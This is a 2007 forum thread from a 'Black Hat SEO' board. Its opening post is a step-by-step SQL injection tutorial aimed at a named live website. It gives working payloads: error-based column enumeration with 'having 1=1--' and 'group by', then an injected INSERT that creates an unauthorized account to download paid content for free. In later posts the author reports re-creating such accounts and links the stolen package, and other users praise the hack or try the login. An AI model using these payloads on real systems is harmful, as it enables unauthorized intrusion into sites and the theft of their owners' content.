1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Site Hacking 101

Discussion in 'Black Hat SEO' started by nova, Nov 26, 2007.

  1. nova

    nova BANNED BANNED

    Joined:
    Jul 23, 2007
    Messages:
    256
    Likes Received:
    41
    OK boys and girls. Here is how you can hack some sites using a method called SQL injection.

    Now as you all know, sites use databases to store their users information. SQL Server from microsoft is one of the popular databases and 99% of the times the sites using this database are coded in a language called ASP.

    The pages on such a site end with the extension .asp

    The first test we need to do is to find a form on such a site say for example a login form. Now our objective is to create an account on such a site.

    Ill take a case study. Just today I got an email from a internet marketer promoting this.

    I mailed him about this vulnerability but he hasn't responded, so I guess hes not bothered about this.. oh well...

    http://www.adsalternative.com/index.asp

    So we go to the members login page

    http://www.adsalternative.com/members/login.asp

    BIG mistake letting people know the login page to the members area.

    Now we enter the
    Code:
     ' 
    character in the username field. We get this message.

    "Please ensure that you enter both your Username and your Password in order to log in to the members' area"

    Which means that hes validating both the username and password.

    So lets enter ' in both the fields and press login

    Which returns this error

    Code:
    "Microsoft OLE DB Provider for SQL Server error '80040e14' 
    
    Incorrect syntax near 'ds'. 
    
    /includes/databaseconnect.asp, line 21 "
    
    Which means that his asp script isnt checking for the ' character and this is the basis of this expliot.

    Now we type

    ' having 1=1-- into the user name and ' into the password and press login


    Which returns us this error

    Code:
    Microsoft OLE DB Provider for SQL Server error '80040e14' 
    
    Column 'members.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 
    
    /includes/databaseconnect.asp, line 21 
    
    So now we know that his table name is members and his first column is id.

    Now we use a "group by" SQL clause to find out the other column names

    so we type the user name as ' group by users.id having 1=1--
    and ' as the password and press login

    which returns the error

    Code:
    Microsoft OLE DB Provider for SQL Server error '80040e14' 
    
    Column 'members.emailAddress' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 
    
    /includes/databaseconnect.asp, line 21 
    
    
    so we know his next column is emailAddress.

    Continuing in this manner, grouping by each column name, we get his whole table structure

    Once we have that all we need to do is insert a record with our name.

    So in the username field we enter

    Code:
    '; insert into members(username,password) values('jack', 'hack')--
    and in the password field we enter
    Code:
    '
    and press login

    This has created us an account with the username jack and the password hack.

    Now we can login with this username and password and download all his shite for free :D

    Another example of poor site protection :nutkick:

    So mods does this qualify for the VIP access :D






    http://tubeautomator.com/squeeze.php​
    '
     
    • Thanks Thanks x 3
  2. trumpinc2000

    trumpinc2000 Registered Member

    Joined:
    Oct 11, 2007
    Messages:
    81
    Likes Received:
    112
    Occupation:
    Making Money
    You have been busy. Very nice share.:D
     
  3. paranoid1288

    paranoid1288 Junior Member

    Joined:
    Nov 4, 2007
    Messages:
    104
    Likes Received:
    4
    nice share, keep your awesome hacks comming
     
  4. caroz

    caroz Registered Member

    Joined:
    Aug 23, 2007
    Messages:
    60
    Likes Received:
    1
    nice post Nova, next time whould be nice if you added some screenshots from step to step. I understood it but i think some pepole that is new to this will appricate it! :)
     
  5. soulchief

    soulchief Junior Member

    Joined:
    Oct 17, 2007
    Messages:
    117
    Likes Received:
    55
    Location:
    Canada
    wow, nice information. Now to secure my sites so this cant happen to me :p

    Edit: does this work for only .asp?
     
  6. justmeron

    justmeron Power Member

    Joined:
    Sep 16, 2007
    Messages:
    752
    Likes Received:
    211
    Location:
    Indiana, USA
    Nice post.
    He must have deleted the account you created.
    I tried signing in using jack hack and got invalid username.
    Sounds complicated to me, I'm not a mod but sure qualifies for VIP to me.
     
  7. justmeron

    justmeron Power Member

    Joined:
    Sep 16, 2007
    Messages:
    752
    Likes Received:
    211
    Location:
    Indiana, USA
    I tried to use it and like on step 2 when I put ' in both blanks it now gives me an error HTTP 500 Internal Server Error page cannot be displayed.
    So you must have gotten his attention and inspired some changes. :cool:
     
  8. onel

    onel Newbie

    Joined:
    Nov 22, 2007
    Messages:
    49
    Likes Received:
    29
    i believe there's an equivalent for this in MySQL
     
  9. ceo

    ceo Newbie

    Joined:
    Nov 27, 2007
    Messages:
    12
    Likes Received:
    0
    Wow.
    That was very well described nova.
    Good work !
     
  10. billa1

    billa1 Newbie

    Joined:
    Nov 26, 2007
    Messages:
    3
    Likes Received:
    0
    it says login jack and hack is incorrect, can someone give new login? or reupload the stuff? thanks
     
  11. nova

    nova BANNED BANNED

    Joined:
    Jul 23, 2007
    Messages:
    256
    Likes Received:
    41
    Yes it works on php sites as well, but the magic quotes has to be disabled.

    There are other hacks for PHP as well. Ill post them in a new thread.

    About the current site, NO he hasn't fixed it.

    I created the "jack/hack" account again.

    Enjoy! :bukkake:


    http://www.blogcommentor.com/​
     
  12. hehe

    hehe Newbie

    Joined:
    Nov 26, 2007
    Messages:
    7
    Likes Received:
    0
    Ergo he did change something in the backend but with the group by clause you can still get around it?
     
  13. travs

    travs BANNED BANNED

    Joined:
    Apr 14, 2006
    Messages:
    224
    Likes Received:
    51
    hehehe I nominate that nova shall be granted a VIP access :D
     
  14. turket

    turket Newbie

    Joined:
    Nov 28, 2007
    Messages:
    30
    Likes Received:
    1
    Very nice, phpnuke is filled with vulnerabilities like this, beware:)
     
  15. nova

    nova BANNED BANNED

    Joined:
    Jul 23, 2007
    Messages:
    256
    Likes Received:
    41
    Still doesn't seem fixed LOL. I created 2 accounts again jack/hack and youare/solame


    http://img148.imageshack.us/my.php?image=24939471ht6.gif

    http://img137.imageshack.us/my.php?image=92518693dn0.gif

    http://img148.imageshack.us/my.php?image=41383314dr6.gif

    http://img518.imageshack.us/my.php?image=89304755bj9.gif


    :D

    Entire package: http://www.linkbucks.com/link/ff430729/7453






    http://www.blogcommentor.com/​
     
  16. Tony

    Tony Registered Member

    Joined:
    Nov 23, 2007
    Messages:
    67
    Likes Received:
    46
    wow great tutorial tnks a lot :D
     
  17. artswerdstone

    artswerdstone Power Member

    Joined:
    Nov 24, 2007
    Messages:
    673
    Likes Received:
    764
    Hi Nova,

    Congrats for the hack, and thanks for the links! I'd like commenting them, but that should be another thread.
     
  18. artswerdstone

    artswerdstone Power Member

    Joined:
    Nov 24, 2007
    Messages:
    673
    Likes Received:
    764
    Hi,

    After you're familiarized with Nova's great tutorial, maybe you'll want to have an SQL inj*ection cheat sheet hxxp://preview.***********/2ncvyx
     
  19. bboy69

    bboy69 Newbie

    Joined:
    Nov 28, 2007
    Messages:
    8
    Likes Received:
    0
    This is great stuff mate, nice going.
     
  20. andrew777

    andrew777 Newbie

    Joined:
    Nov 27, 2007
    Messages:
    5
    Likes Received:
    0
    thanks for sharing